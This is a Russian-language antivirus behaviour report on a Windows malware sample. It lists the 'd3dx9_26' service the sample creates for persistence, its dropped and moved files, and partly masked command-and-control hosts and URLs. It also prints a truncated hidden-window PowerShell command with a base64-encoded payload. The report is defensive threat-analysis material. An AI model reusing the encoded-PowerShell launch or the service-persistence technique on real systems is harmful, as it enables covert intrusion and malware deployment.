Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\d3dx9_26] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\d3dx9_26] 'ImagePath' = '"%WINDIR%\SysWOW64\AltTab\d3dx9_26.exe"'
Создает следующие сервисы
- 'd3dx9_26' "%WINDIR%\SysWOW64\AltTab\d3dx9_26.exe"
- 'd3dx9_26' %WINDIR%\SysWOW64\AltTab\d3dx9_26.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFMASQBKAFcAbQByAHMAPQAnAFYAVwBWAEsASgBmAHAAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQBgAFIASQB0AFkAcAByAG8AVABPAEMAbwBMACIAIAA9AC...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\700.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\alttab\d3dx9_26.exe
Перемещает следующие файлы
- %HOMEPATH%\700.exe в %WINDIR%\syswow64\alttab\d3dx9_26.exe
Сетевая активность
Подключается к
- '20#.#71.150.41':443
- '94.##.247.61':8080
- '21#.#76.36.147':8080
TCP
Запросы HTTP GET
- http://ha####shomes.net/abouts/G56G/
- http://ik##i24.com/adsl/AJ55/
- http://www.vi##-all.ch/js/BJMp5490/
Запросы HTTP POST
- http://21#.##6.36.147:8080/gRF15skggW7qu/SNGoHDxm/pXjGaSIUXxU2Wa5B/7BHzIMqV5EA/DWVLjw02d/JEmR8QW/ via 21#.#76.36.147
UDP
- DNS ASK ha####shomes.net
- DNS ASK ik##i24.com
- DNS ASK vi##-all.ch
- DNS ASK go####soccer.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\700.exe'
- '%WINDIR%\syswow64\alttab\d3dx9_26.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFMASQBKAFcAbQByAHMAPQAnAFYAVwBWAEsASgBmAHAAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQBgAFIASQB0AFkAcAByAG8AVABPAEMAbwBMACIAIAA9AC...' (со скрытым окном)
